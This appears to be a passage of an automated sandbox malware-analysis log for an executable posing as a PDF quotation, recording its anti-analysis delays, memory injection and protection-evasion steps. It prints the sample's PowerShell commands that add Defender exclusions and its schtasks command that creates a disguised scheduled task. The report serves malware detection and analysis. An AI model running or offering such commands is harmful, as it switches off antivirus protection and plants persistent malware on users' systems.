                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess information set: NOGPFAULTERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mexnJkivovwH.exe PID: 7908, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: 15E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: 3260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: 5780000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: 6780000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: 68B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: 78B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: EAF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: D3F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: FAF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: 10AF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMemory allocated: A50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMemory allocated: 2440000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMemory allocated: 4440000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMemory allocated: 4A60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMemory allocated: 5A60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMemory allocated: 5B90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMemory allocated: 6B90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMemory allocated: D760000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMemory allocated: E760000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMemory allocated: EBF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4036Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4702Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep count: 4036 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 43 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe TID: 7776Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe TID: 8020Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeThread delayed: delay time: 922337203685477
                    Source: mexnJkivovwH.exe, 0000000D.00000002.1742647145.0000000001078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
                    Source: Quotation2025-0107pdf.exe, 00000008.00000002.2909417745.0000000000A78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 13_2_0040317B mov eax, dword ptr fs:[00000030h]13_2_0040317B
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 13_2_00402B7C GetProcessHeap,RtlAllocateHeap,13_2_00402B7C
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeMemory written: C:\Users\user\Desktop\Quotation2025-0107pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeMemory written: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeProcess created: C:\Users\user\Desktop\Quotation2025-0107pdf.exe "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp"
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeProcess created: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Users\user\Desktop\Quotation2025-0107pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
